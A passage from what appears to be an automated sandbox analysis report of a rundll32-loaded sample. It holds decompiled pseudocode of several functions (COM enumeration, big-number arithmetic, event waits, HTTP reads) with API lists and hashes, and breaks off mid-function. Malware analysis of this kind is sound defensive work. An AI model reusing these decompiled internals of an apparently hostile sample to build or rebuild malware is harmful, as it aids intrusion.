                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 2ffaccc79777ff6eb79734099ef28aba6682f64f0937adf1b03ae311dfd8cb54
                                          • Instruction ID: 5fcd3c1dea173e3427d27f10835096ea0aaf39955b83a9af73c320ba23a23f9e
                                          • Opcode Fuzzy Hash: 2ffaccc79777ff6eb79734099ef28aba6682f64f0937adf1b03ae311dfd8cb54
                                          • Instruction Fuzzy Hash: 62515039500709EFDB01DFA8D844A9EB7B6FF98740F158829E505EB260EB35EE46CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C091B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E04C091B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4c0d2a4; // 0x97a5a8
					_t5 = _t103 + 0x4c0e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4c0c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4c0d2a4; // 0x97a5a8
												_t28 = _t109 + 0x4c0e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4c0d2a4; // 0x97a5a8
														_t33 = _t79 + 0x4c0e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x04c091ba
                                          0x04c091c3
                                          0x04c091c4
                                          0x04c091c8
                                          0x04c091ce
                                          0x04c091d4
                                          0x04c091dd
                                          0x04c091e3
                                          0x04c091ed
                                          0x04c091ef
                                          0x04c091f5
                                          0x04c091fa
                                          0x04c09205
                                          0x04c0920b
                                          0x04c09210
                                          0x04c09332
                                          0x04c09216
                                          0x04c09216
                                          0x04c09223
                                          0x04c09229
                                          0x04c0922f
                                          0x04c09233
                                          0x04c09239
                                          0x04c09246
                                          0x04c0924a
                                          0x04c09250
                                          0x04c09253
                                          0x04c0925b
                                          0x04c0925c
                                          0x04c09260
                                          0x04c09264
                                          0x04c09267
                                          0x04c0926a
                                          0x04c09270
                                          0x04c09279
                                          0x04c0927f
                                          0x04c09280
                                          0x04c09283
                                          0x04c09284
                                          0x04c09285
                                          0x04c0928d
                                          0x04c0928e
                                          0x04c0928f
                                          0x04c09291
                                          0x04c09295
                                          0x04c09299
                                          0x00000000
                                          0x00000000
                                          0x04c0929f
                                          0x04c092a8
                                          0x04c092ae
                                          0x04c092b8
                                          0x04c092bc
                                          0x04c092be
                                          0x04c092cb
                                          0x04c092cf
                                          0x04c092d7
                                          0x04c092dc
                                          0x04c092ee
                                          0x04c092f0
                                          0x04c092f6
                                          0x04c092f6
                                          0x04c092ff
                                          0x04c092ff
                                          0x04c09301
                                          0x04c09307
                                          0x04c09307
                                          0x04c0930a
                                          0x04c09310
                                          0x04c09313
                                          0x04c0931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0931c
                                          0x04c09270
                                          0x04c0926a
                                          0x04c09253
                                          0x04c09322
                                          0x04c09322
                                          0x04c09328
                                          0x04c09328
                                          0x04c0932e
                                          0x04c0932e
                                          0x04c09337
                                          0x04c0933d
                                          0x04c0933d
                                          0x04c091fa
                                          0x04c09346

                                          APIs
                                          • SysAllocString.OLEAUT32(04C0C298), ref: 04C09205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04C092E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C092FF
                                          • SysFreeString.OLEAUT32(?), ref: 04C0932E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 4cea6a501a92f91ad60c29243817d5e86452e4ca2466e9606fad3263ba7d9a9c
                                          • Instruction ID: f54613aacf0948351aebb1a194ad397caeeb48d26b0e5ff69944ab87e031d1be
                                          • Opcode Fuzzy Hash: 4cea6a501a92f91ad60c29243817d5e86452e4ca2466e9606fad3263ba7d9a9c
                                          • Instruction Fuzzy Hash: B3517F75D00509DFCB04DFE8C8889AEB7BAEF88704B158594E915EB261D731AE42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C07664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E04C07664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04C048F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04C0748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04C07074(_t101,  &_v236, _a8, _t96 - _t81);
					E04C07074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04C0748A(_t101,  &E04C0D1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04C0748A(_a16, _a4);
						E04C02FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04C0B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04C0B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04C06FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04C015CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04C0687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E04C0D1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x04c07667
                                          0x04c07673
                                          0x04c07679
                                          0x04c0767e
                                          0x04c07682
                                          0x04c077df
                                          0x04c077e3
                                          0x04c077e3
                                          0x04c07688
                                          0x04c0768c
                                          0x04c07690
                                          0x04c07693
                                          0x04c0769e
                                          0x04c076a4
                                          0x04c076a9
                                          0x04c076ac
                                          0x04c076c6
                                          0x04c076d2
                                          0x04c076db
                                          0x04c076e5
                                          0x04c076ea
                                          0x04c076ec
                                          0x04c076ef
                                          0x04c0779d
                                          0x04c077a3
                                          0x04c077b4
                                          0x04c077c7
                                          0x04c077d7
                                          0x00000000
                                          0x04c077dc
                                          0x04c076f8
                                          0x04c076ff
                                          0x04c07703
                                          0x04c07709
                                          0x04c0770b
                                          0x04c0770d
                                          0x04c0770f
                                          0x04c07711
                                          0x04c0771b
                                          0x04c07720
                                          0x04c07722
                                          0x04c07724
                                          0x04c07725
                                          0x04c07726
                                          0x04c07727
                                          0x04c0772e
                                          0x04c07735
                                          0x04c07738
                                          0x04c07738
                                          0x04c07705
                                          0x04c07705
                                          0x04c07705
                                          0x04c07740
                                          0x04c07748
                                          0x04c07751
                                          0x04c07756
                                          0x04c07756
                                          0x04c0775b
                                          0x00000000
                                          0x00000000
                                          0x04c0775d
                                          0x04c07760
                                          0x04c0776a
                                          0x00000000
                                          0x00000000
                                          0x04c0776c
                                          0x04c0776c
                                          0x04c07776
                                          0x04c07756
                                          0x04c0775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0775b
                                          0x04c07780
                                          0x04c07783
                                          0x04c07786
                                          0x04c0778d
                                          0x04c0778d
                                          0x04c0779a
                                          0x00000000
                                          0x04c0779a
                                          0x04c07695
                                          0x04c07699
                                          0x04c0769a
                                          0x04c0769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04C07711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04C07727
                                          • memset.NTDLL ref: 04C077C7
                                          • memset.NTDLL ref: 04C077D7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: c76b4741f9cbda0792b036dcac90f4c97c0f6e870441c931901d2409d4a07bad
                                          • Instruction ID: e7cd20b1ba65555df81f89e2b968818d175d65af05f89843e07c0e091f278dc5
                                          • Opcode Fuzzy Hash: c76b4741f9cbda0792b036dcac90f4c97c0f6e870441c931901d2409d4a07bad
                                          • Instruction Fuzzy Hash: 7A418031A01259ABEB15EFACCC40BDE777AEF44314F10C529E916AB1C0EB71BE549B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0A96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04C0A97E
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • ResetEvent.KERNEL32(?), ref: 04C0A9F2
                                          • GetLastError.KERNEL32 ref: 04C0AA15
                                          • GetLastError.KERNEL32 ref: 04C0AAC0
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: a73f5f9af768bcaffe90aed3df101dbd46ad4889d87b346bcb38f0afa0e5fe35
                                          • Instruction ID: 4545f7f1fcd7132d7a443a3a2e7347a18a77b2506159c2f6193dc8466d19874d
                                          • Opcode Fuzzy Hash: a73f5f9af768bcaffe90aed3df101dbd46ad4889d87b346bcb38f0afa0e5fe35
                                          • Instruction Fuzzy Hash: BE416C75600704BFE7319FA5CD48EAB7ABEEB98B04F158929F543910D0E736AA44DE20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C08F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04C08F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x4c0d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4c0d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04C058BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x4c0d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04C0147E(_v16);
							if(_t58 == 0) {
								_t58 = E04C016DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04C09D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04C09D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x04c08f17
                                          0x04c08f1c
                                          0x04c08f1e
                                          0x04c08f23
                                          0x04c08f24
                                          0x04c08f29
                                          0x04c08f2a
                                          0x04c08f35
                                          0x04c08f66
                                          0x04c08f6b
                                          0x04c0902e
                                          0x04c09031
                                          0x04c09037
                                          0x04c09037
                                          0x04c08f78
                                          0x04c08f80
                                          0x04c0902b
                                          0x00000000
                                          0x04c0902b
                                          0x04c08f8b
                                          0x04c08f90
                                          0x04c08f95
                                          0x04c0901d
                                          0x04c0901e
                                          0x04c0901e
                                          0x04c09024
                                          0x00000000
                                          0x04c09024
                                          0x04c08f9b
                                          0x04c08f9d
                                          0x04c08fa3
                                          0x04c08fa4
                                          0x04c08fa4
                                          0x04c08fa7
                                          0x04c08faa
                                          0x04c08fb0
                                          0x04c08fb5
                                          0x04c08fb6
                                          0x04c08fbb
                                          0x04c08fbe
                                          0x04c08fc9
                                          0x00000000
                                          0x00000000
                                          0x04c08fd1
                                          0x04c08fd9
                                          0x04c09002
                                          0x04c09005
                                          0x04c0900c
                                          0x04c09017
                                          0x04c09017
                                          0x00000000
                                          0x04c0900c
                                          0x04c08fe5
                                          0x04c08fe9
                                          0x00000000
                                          0x00000000
                                          0x04c08feb
                                          0x04c08ff0
                                          0x00000000
                                          0x00000000
                                          0x04c08ff2
                                          0x04c08ff2
                                          0x04c08ff7
                                          0x00000000
                                          0x00000000
                                          0x04c08ff9
                                          0x04c08ffa
                                          0x04c08ffd
                                          0x04c08ffd
                                          0x04c08fa4
                                          0x04c08f3d
                                          0x04c08f45
                                          0x04c08f5e
                                          0x04c08f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c08f60
                                          0x04c08f51
                                          0x04c08f55
                                          0x00000000
                                          0x00000000
                                          0x04c08f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04C08F1E
                                          • GetLastError.KERNEL32 ref: 04C08F37
                                            • Part of subcall function 04C09D3A: WaitForMultipleObjects.KERNEL32(00000002,04C0AA33,00000000,04C0AA33,?,?,?,04C0AA33,0000EA60), ref: 04C09D55
                                          • ResetEvent.KERNEL32(?), ref: 04C08FB0
                                          • GetLastError.KERNEL32 ref: 04C08FCB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 1b470956846c26e0acb5089c6a173c9bca9a7476f2e9daa2801708a146dbf125
                                          • Instruction ID: 331edf6ec652e6318f2f9b77bf2d9ce863cff366961ba40e6a0b6a1e0261b76e
                                          • Opcode Fuzzy Hash: 1b470956846c26e0acb5089c6a173c9bca9a7476f2e9daa2801708a146dbf125
                                          • Instruction Fuzzy Hash: 1031E476A00204ABDB219FA4CC44F5EB7BBEF88368F158524E552971D1EB70FA819B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C072F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E04C072F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4c0d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4c0d2a4; // 0x97a5a8
				_t3 = _t8 + 0x4c0e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E04C06AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4c0d2a8, 1, 0, _t30);
					E04C0147E(_t30);
				}
				_t12 =  *0x4c0d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04C056A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04C01493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4c0d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04C07827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x04c072f3
                                          0x04c072fa
                                          0x04c07304
                                          0x04c07308
                                          0x04c0730e
                                          0x04c0731d
                                          0x04c07324
                                          0x04c07328
                                          0x04c0733a
                                          0x04c0733c
                                          0x04c0733c
                                          0x04c07341
                                          0x04c07348
                                          0x04c0739f
                                          0x04c0739f
                                          0x04c073a5
                                          0x04c073a7
                                          0x04c073a7
                                          0x04c073b1
                                          0x04c073b5
                                          0x04c073c7
                                          0x04c073c7
                                          0x04c073cb
                                          0x04c073d1
                                          0x04c073d1
                                          0x00000000
                                          0x04c07361
                                          0x04c07366
                                          0x04c0736e
                                          0x04c07372
                                          0x04c07376
                                          0x04c07376
                                          0x04c07383
                                          0x04c07387
                                          0x04c0738b
                                          0x04c073e0
                                          0x04c073e6
                                          0x04c073e6
                                          0x04c07399
                                          0x04c0739d
                                          0x04c073d4
                                          0x04c073d6
                                          0x04c073d9
                                          0x04c073d9
                                          0x00000000
                                          0x04c073d6
                                          0x04c0739d
                                          0x00000000
                                          0x04c07387

                                          APIs
                                            • Part of subcall function 04C06AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04C02098,74666F53,00000000,?,04C0D00C,?,?), ref: 04C06B2D
                                            • Part of subcall function 04C06AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04C06B51
                                            • Part of subcall function 04C06AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04C06B59
                                          • CreateEventA.KERNEL32(04C0D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04C0555B,?,?,?), ref: 04C07333
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04C0555B,00000000,00000000,?,00000000,?,04C0555B,?,?,?), ref: 04C07393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04C0555B,?,?,?), ref: 04C073C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04C0555B,?,?,?), ref: 04C073D9
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: d92db75ea437766d4e2dc16a3cdb19794b1e85393fd6f5f85c9c7476cf504b9d
                                          • Instruction ID: 50c08756660ccc7805de180093ec90e4350312524ff6048aa98df747503b02f5
                                          • Opcode Fuzzy Hash: d92db75ea437766d4e2dc16a3cdb19794b1e85393fd6f5f85c9c7476cf504b9d
                                          • Instruction Fuzzy Hash: FC21F2366023529BEB395EACA884B6A729BEB88714B068634FD52D61C0DB74FD418650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0A1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E04C0A1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4c0d140; // 0x4c0ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04C058BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04C0147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
